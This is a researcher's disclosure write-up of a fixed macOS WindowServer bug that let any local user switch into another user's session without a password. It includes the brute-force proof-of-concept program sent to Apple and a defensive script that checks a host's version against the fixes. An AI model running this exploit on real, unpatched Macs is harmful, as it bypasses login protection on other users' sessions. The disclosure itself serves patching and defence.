SkyLight user session exploit

While working on non-Metal acceleration in 2021, I stumbled on a WindowServer bug allowing any user to switch to another user's session without entering their password. Apple fixed the bug in macOS 11.6.1 and 12.0.1 and paid me a generous bounty.
Bizarrely, the bug was reintroduced at some point in Ventura, and fixed again in late 2023, resulting in a second bounty payment.

thanks

ASentientHedgehog and Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!

code

This is the program I submitted to Apple. It simply brute-forces SLSSessionSwitchToSessionID, which lacked the necessary checks. A real attacker would do something cleverer; session IDs are readily available in logs and other APIs.

// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing
@import Foundation;

// Private SkyLight (WindowServer) entry points; declared by hand because there are no public headers.
void SLSSessionSwitchToSessionID(int);
NSDictionary* SLSCopyCurrentSessionDictionary();
extern NSString* kCGSSessionOnConsoleKey;

int main() {
    for (int guess = 0;; guess++) {
        NSDictionary* dict = SLSCopyCurrentSessionDictionary();
        // Once our own session is no longer on the console, a switch has happened.
        if ([dict[kCGSSessionOnConsoleKey] isEqual:@false]) {
            printf("😁\n");
            return 0;
        }
        dict.release;
        SLSSessionSwitchToSessionID(guess);
    }
}
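For fleet owners wondering whether a given Big Sur or Monterey build predates the fix, here is a small added check (my own, not the program submitted to Apple). It only encodes the two fix versions the post names, 11.6.1 and 12.0.1; the Ventura reintroduction is fixed in a build the post does not name, so 13.x and later are reported as "not-assessed" rather than guessed. The helper names `split_version` and `fix_status` are mine.

```sh
#!/bin/sh
# Added example, not the post's code. Classifies a macOS version string against
# the two fixes named in the post: 11.6.1 (Big Sur) and 12.0.1 (Monterey).
# The Ventura reintroduction has no fix version stated, so 13.x and later are
# reported as "not-assessed" rather than invented.

# Split "MAJOR.MINOR.PATCH" (missing parts default to 0) into VMAJOR/VMINOR/VPATCH.
split_version() {
  v="$1"
  VMAJOR=${v%%.*}
  rest=${v#*.}; [ "$rest" = "$v" ] && rest=0
  VMINOR=${rest%%.*}
  VPATCH=${rest#*.}; [ "$VPATCH" = "$rest" ] && VPATCH=0
}

# fix_status VERSION -> prints pre-fix | fixed | not-assessed
fix_status() {
  split_version "$1"
  case "$VMAJOR" in
    11)
      # Anything before 11.6.1 predates the documented fix.
      if [ "$VMINOR" -lt 6 ] || { [ "$VMINOR" -eq 6 ] && [ "$VPATCH" -lt 1 ]; }; then
        echo pre-fix
      else
        echo fixed
      fi ;;
    12)
      # Only 12.0 itself predates 12.0.1.
      if [ "$VMINOR" -eq 0 ] && [ "$VPATCH" -lt 1 ]; then
        echo pre-fix
      else
        echo fixed
      fi ;;
    *)
      # Older majors and Ventura-or-later are outside what the post documents.
      echo not-assessed ;;
  esac
}

# On a Mac, classify the running host; elsewhere sw_vers does not exist, so skip.
if command -v sw_vers >/dev/null 2>&1; then
  host_version=$(sw_vers -productVersion)
  echo "host $host_version: $(fix_status "$host_version")"
fi
```

Run it on the machine itself, or feed `fix_status` version strings collected from an MDM inventory; "pre-fix" is the only result that says a host still ships the unchecked SLSSessionSwitchToSessionID.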